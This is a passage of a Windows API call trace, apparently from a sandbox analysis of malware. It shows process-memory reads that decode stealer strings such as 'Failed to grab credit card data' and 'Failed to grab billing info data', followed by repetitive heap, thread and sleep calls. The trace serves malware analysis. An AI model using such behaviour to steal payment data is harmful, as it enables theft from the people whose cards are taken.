lpBuffer=0x32e805f0*, lpNumberOfBytesRead=0x87fc58*=0x3ff) returned 1 [0180.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e805f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0180.796] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x50) returned 0x32e65e20 [0180.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e805f0, cbMultiByte=-1, lpWideCharStr=0x32e65e20, cchWideChar=34 | out: lpWideCharStr="Failed to grab credit card data: ") returned 34 [0180.796] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f3b0, lpBuffer=0x32e41940, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e41940*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e41940, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1 [0180.796] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e80fd0 [0180.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e41940, cbMultiByte=-1, lpWideCharStr=0x32e80fd0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0180.796] SetEvent (hEvent=0x1b4) returned 1 [0180.800] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65bd0 | out: hHeap=0x2150000) returned 1 [0180.800] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e805f0 | out: hHeap=0x2150000) returned 1 [0180.800] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41940 | out: hHeap=0x2150000) returned 1 [0180.800] GetTickCount () returned 0x2088bd7 [0180.800] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70c20 [0180.800] GetTickCount () returned 0x2088bd7 [0180.800] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e80f10 [0180.800] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x111a60, lpParameter=0x32e781a0, dwCreationFlags=0x0, lpThreadId=0x87fd8c | out: lpThreadId=0x87fd8c*=0x66c) returned 0x7f8 [0180.802] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80f10 | out: hHeap=0x2150000) returned 1 [0180.802] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.810] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.827] GetTickCount () returned 0x208948c [0180.827] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e778e0 [0180.827] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x102 [0180.828] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e41940 [0180.828] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e65bd0 [0180.828] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x32e805f0 [0180.828] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110068, lpBuffer=0x87fcd8, nSize=0x38, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x87fcd8*, lpNumberOfBytesRead=0x87fc58*=0x38) returned 1 [0180.828] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f3d0, lpBuffer=0x32e65bd0, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e65bd0*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65bd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0180.828] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e80cd0 [0180.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65bd0, cbMultiByte=-1, lpWideCharStr=0x32e80cd0, cchWideChar=5 | out: lpWideCharStr="DPST") returned 5 [0180.828] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x613740, lpBuffer=0x32e805f0, nSize=0x3ff, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e805f0*, lpNumberOfBytesRead=0x87fc58*=0x3ff) returned 1 [0180.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e805f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35 [0180.829] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x50) returned 0x32e655b0 [0180.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e805f0, cbMultiByte=-1, lpWideCharStr=0x32e655b0, cchWideChar=35 | out: lpWideCharStr="Failed to grab billing info data: ") returned 35 [0180.829] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f3c0, lpBuffer=0x32e41940, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e41940*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e41940, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1 [0180.829] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e81070 [0180.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e41940, cbMultiByte=-1, lpWideCharStr=0x32e81070, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0180.829] SetEvent (hEvent=0x1b4) returned 1 [0181.221] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65bd0 | out: hHeap=0x2150000) returned 1 [0181.221] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e805f0 | out: hHeap=0x2150000) returned 1 [0181.221] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41940 | out: hHeap=0x2150000) returned 1 [0181.221] GetTickCount () returned 0x2089613 [0181.221] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e714c0 [0181.221] GetTickCount () returned 0x2089613 [0181.221] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e80f10 [0181.222] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x111a60, lpParameter=0x32e778e0, dwCreationFlags=0x0, lpThreadId=0x87fd8c | out: lpThreadId=0x87fd8c*=0x780) returned 0x814 [0181.222] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80f10 | out: hHeap=0x2150000) returned 1 [0181.223] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.316] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.346] GetTickCount () returned 0x2089f26 [0181.346] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77ca0 [0181.346] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0181.346] GetTickCount () returned 0x2089f26 [0181.346] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fa20 [0181.347] GetTickCount () returned 0x2089f26 [0181.347] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6fa20 | out: hHeap=0x2150000) returned 1 [0181.347] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77ca0 | out: hHeap=0x2150000) returned 1 [0181.347] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.410] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.444] GetTickCount () returned 0x208a81a [0181.444] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77aa0 [0181.444] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0181.444] GetTickCount () returned 0x208a81a [0181.444] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fa20 [0181.444] GetTickCount () returned 0x208a81a [0181.444] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6fa20 | out: hHeap=0x2150000) returned 1 [0181.444] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77aa0 | out: hHeap=0x2150000) returned 1 [0181.444] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.479] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.525] GetTickCount () returned 0x208b10d [0181.525] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e78060 [0181.526] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0181.526] GetTickCount () returned 0x208b10d [0181.526] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fcf0 [0181.526] GetTickCount () returned 0x208b10d [0181.526] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6fcf0 | out: hHeap=0x2150000) returned 1 [0181.526] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e78060 | out: hHeap=0x2150000) returned 1 [0181.527] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.540] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.542] GetTickCount () returned 0x208b9b3 [0181.542] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77ca0 [0181.542] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0181.542] GetTickCount () returned 0x208b9b3 [0181.542] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fa20 [0181.542] GetTickCount () returned 0x208b9b3 [0181.542] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6fa20 | out: hHeap=0x2150000) returned 1 [0181.542] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77ca0 | out: hHeap=0x2150000) returned 1 [0181.542] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.543] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.546] GetTickCount () returned 0x208c249 [0181.546] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e782e0 [0181.546] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0181.546] GetTickCount () returned 0x208c249 [0181.546] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fa20 [0181.546] GetTickCount () returned 0x208c249 [0181.546] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6fa20 | out: hHeap=0x2150000) returned 1 [0181.546] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e782e0 | out: hHeap=0x2150000) returned 1 [0181.546] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.547] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.549] GetTickCount () returned 0x208cadf [0181.549] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77be0 [0181.549] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0181.549] GetTickCount () returned 0x208cadf [0181.549] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fcf0 [0181.549] GetTickCount () returned 0x208cadf [0181.549] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6fcf0 | out: hHeap=0x2150000) returned 1 [0181.549] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77be0 | out: hHeap=0x2150000) returned 1 [0181.549] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.551] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.553] GetTickCount () returned 0x208d375 [0181.553] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e782e0 [0181.553] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0181.553] GetTickCount () returned 0x208d375 [0181.553] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fa20 [0181.553] GetTickCount () returned 0x208d375 [0181.553] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6fa20 | out: hHeap=0x2150000) returned 1 [0181.553] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e782e0 | out: hHeap=0x2150000) returned 1 [0181.553] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.554] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.560] GetTickCount () returned 0x208dc1b [0181.560] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77f20 [0181.561] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0181.561] GetTickCount () returned 0x208dc1b [0181.561] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fa20 [0181.561] GetTickCount () returned 0x208dc1b [0181.561] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6fa20 | out: hHeap=0x2150000) returned 1 [0181.561] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77f20 | out: hHeap=0x2150000) returned 1 [0181.561] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.562] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.580] GetTickCount () returned 0x208e4c0 [0181.580] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e783e0 [0181.580] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0181.581] GetTickCount () returned 0x208e4c0 [0181.581] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fa20 [0181.581] GetTickCount () returned 0x208e4c0 [0181.581] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6fa20 | out: hHeap=0x2150000) returned 1 [0181.581] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e783e0 | out: hHeap=0x2150000) returned 1 [0181.581] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.594] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.610] GetTickCount () returned 0x208ed75 [0181.610] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77c20 [0181.611] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0181.611] GetTickCount () returned 0x208ed75 [0181.611] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fcf0 [0181.611] GetTickCount () returned 0x208ed75 [0181.611] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6fcf0 | out: hHeap=0x2150000) returned 1 [0181.611] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77c20 | out: hHeap=0x2150000) returned 1 [0181.611] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.637] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.641] GetTickCount () returned 0x208f62b [0181.641] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77c20 [0181.642] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0181.642] GetTickCount () returned 0x208f62b [0181.642] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fcf0 [0181.642] GetTickCount () returned 0x208f62b [0181.642] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6fcf0 | out: hHeap=0x2150000) returned 1 [0181.642] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77c20 | out: hHeap=0x2150000) returned 1 [0181.642] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.657] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.659] GetTickCount () returned 0x208fed0 [0181.659] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77d60 [0181.659] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0181.659] GetTickCount () returned 0x208fed0 [0181.659] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fcf0 [0181.659] GetTickCount () returned 0x208fed0 [0181.659] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6fcf0 | out: hHeap=0x2150000) returned 1 [0181.659] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77d60 | out: hHeap=0x2150000) returned 1 [0181.659] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.661] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.663] GetTickCount () returned 0x2090766 [0181.663] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77760 [0181.663] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0181.663] GetTickCount () returned 0x2090766 [0181.663] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fa20 [0181.663] GetTickCount () returned 0x2090766 [0181.663] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6fa20 | out: hHeap=0x2150000) returned 1 [0181.663] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77760 | out: hHeap=0x2150000) returned 1 [0181.663] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.679] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.695] GetTickCount () returned 0x209101c [0181.695] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77e20 [0181.695] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0181.695] GetTickCount () returned 0x209101c [0181.695] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fa20 [0181.695] GetTickCount () returned 0x209101c [0181.695] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6fa20 | out: hHeap=0x2150000) returned 1 [0181.695] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77e20 | out: hHeap=0x2150000) returned 1 [0181.695] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.719] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.726] GetTickCount () returned 0x20918d1 [0181.726] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77d60 [0181.726] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0181.726] GetTickCount () returned 0x20918d1 [0181.726] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fcf0 [0181.726] GetTickCount () returned 0x20918d1 [0181.726] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6fcf0 | out: hHeap=0x2150000) returned 1 [0181.726] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77d60 | out: hHeap=0x2150000) returned 1 [0181.726] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.742] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.762] GetTickCount () returned 0x2092196 [0181.762] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e780a0 [0181.762] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0181.763] GetTickCount () returned 0x2092196 [0181.763] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fcf0 [0181.763] GetTickCount () returned 0x2092196 [0181.763] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6fcf0 | out: hHeap=0x2150000) returned 1 [0181.763] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e780a0 | out: hHeap=0x2150000) returned 1 [0181.763] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.778] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.796] GetTickCount () returned 0x2092a4b [0181.796] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e782a0 [0181.796] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0181.796] GetTickCount () returned 0x2092a4b [0181.796] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fcf0 [0181.797] GetTickCount () returned 0x2092a4b [0181.797] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6fcf0 | out: hHeap=0x2150000) returned 1 [0181.797] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e782a0 | out: hHeap=0x2150000) returned 1 [0181.797] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.810] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.829] GetTickCount () returned 0x2093300 [0181.829] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77760 [0181.829] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0181.829] GetTickCount () returned 0x2093300 [0181.829] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70980 [0181.829] GetTickCount () returned 0x2093300 [0181.829] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70980 | out: hHeap=0x2150000) returned 1 [0181.829] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77760 | out: hHeap=0x2150000) returned 1 [0181.829] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.842] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.858] GetTickCount () returned 0x2093bb5 [0181.858] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77920 [0181.858] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0181.858] GetTickCount () returned 0x2093bb5 [0181.858] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fa20 [0181.858] GetTickCount () returned 0x2093bb5 [0181.859] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6fa20 | out: hHeap=0x2150000) returned 1 [0181.859] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77920 | out: hHeap=0x2150000) returned 1 [0181.859] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.861] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.862] GetTickCount () returned 0x209444b [0181.862] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e783e0 [0181.862] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0181.862] GetTickCount () returned 0x209444b [0181.862] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fa20 [0181.863] GetTickCount () returned 0x209444b [0181.863] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6fa20 | out: hHeap=0x2150000) returned 1 [0181.863] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e783e0 | out: hHeap=0x2150000) returned 1 [0181.863] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.879] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.895] GetTickCount () returned 0x2094d01 [0181.895] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77b60 [0181.895] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0181.895] GetTickCount () returned 0x2094d01 [0181.896] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fa20 [0181.896] GetTickCount () returned 0x2094d01 [0181.896] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6fa20 | out: hHeap=0x2150000) returned 1 [0181.896] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77b60 | out: hHeap=0x2150000) returned 1 [0181.896] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.910] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.927] GetTickCount () returned 0x20955b6 [0181.927] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77da0 [0181.927] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0181.927] GetTickCount () returned 0x20955b6 [0181.927] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70980 [0181.927] GetTickCount () returned 0x20955b6 [0181.927] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70980 | out: hHeap=0x2150000) returned 1 [0181.928] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77da0 | out: hHeap=0x2150000) returned 1 [0181.928] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.946] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.957] GetTickCount () returned 0x2095e6b [0181.957] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77ce0 [0181.957] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0181.957] GetTickCount () returned 0x2095e6b [0181.957] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e703e0 [0181.957] GetTickCount () returned 0x2095e6b [0181.957] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e703e0 | out: hHeap=0x2150000) returned 1 [0181.957] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77ce0 | out: hHeap=0x2150000) returned 1 [0181.957] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.959] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.960] GetTickCount () returned 0x2096711 [0181.960] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77b20 [0181.960] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0181.960] GetTickCount () returned 0x2096711 [0181.961] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e703e0 [0181.961] GetTickCount () returned 0x2096711 [0181.961] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e703e0 | out: hHeap=0x2150000) returned 1 [0181.961] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77b20 | out: hHeap=0x2150000) returned 1 [0181.961] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.962] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0181.979] GetTickCount () returned 0x2096fb6 [0181.979] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e78120 [0181.979] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0181.979] GetTickCount () returned 0x2096fb6 [0181.979] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70140 [0181.979] GetTickCount () returned 0x2096fb6 [0181.979] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70140 | out: hHeap=0x2150000) returned 1 